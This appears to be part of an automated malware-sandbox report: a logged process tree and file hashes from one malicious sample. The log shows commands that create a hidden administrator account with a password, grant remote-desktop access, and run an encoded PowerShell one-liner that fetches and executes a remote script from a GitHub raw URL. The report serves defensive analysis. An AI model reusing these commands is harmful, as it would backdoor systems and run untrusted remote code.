C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:1692
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2164
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc dHyhzWko1⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc dHyhzWko2⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc dHyhzWko3⤵PID:4032
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1676
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:3792
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3176
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3576
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3456
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3136
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
MD5
8b6dbc33111b29f70531663bb22d0d34
SHA1cdf0da45d6e6dedc13e860682de282ad31dea4e6
SHA256074617abdc0fa7e7245561776513dd7508df7a7b66bd65e2c248c77f4f7f132c
SHA512213bdee4b49461ca4c317320d1487d230de947c5e17d382ead656b7b796d20975b7fc7d6c1238a87437e0f9a85ea36427dc7a900bdcbdbcf25308fc56bf9d0df
-
MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
d4095dc2137fcf05a9447de7b2f51d2b
SHA17608c1ce00e140648b48dfeff5077d6f427ab5a6
SHA256706a8809dcb6729af3046da50d9180afc9ce151bc5b1bf26259ed7f1b208c025
SHA51272e07cb4ae4d0d1eacc89df6d73efa60998edd583d51c9c661a7e4a3f043780f90f3ad6896cd57e85a3cb3c02893f6d3cd40e73dec684327f415245cc57a720a
-
MD5
07ff9287e18558c7a63312f59af9d17b
SHA11d99298bed78056f94bf338534146ae6efb5f84c
SHA256d3d5cf587a138a879f1169a244941c6fe3a207fe9d779cb7846a911557826056
SHA512e672e6a25dc06072df5d585c2dbad5c9a51beafd6b35d03a699a3bf21b29a182516d0e4995efcf95df81ad9c9e95f4d1f72426d7b1edbf470d693f654140f398
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
bf20630dcb1708ce50890bbf5afd56eb
SHA1c660aa87b41ddcd711e14ae0768facc21b5b34b6
SHA256a010b34bbaac0b045373b28d249589b4c7a6d5fb46097e10850c1ed86a5a3d76
SHA51261b4e6cf54ad42fa04375e91c20d230c39bb8c65504d7bc7019c52a45ede0fca671d03df715a9dfe70e583476f53e8600506137e2519bf85b02cea9c226f779b
-
MD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
MD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13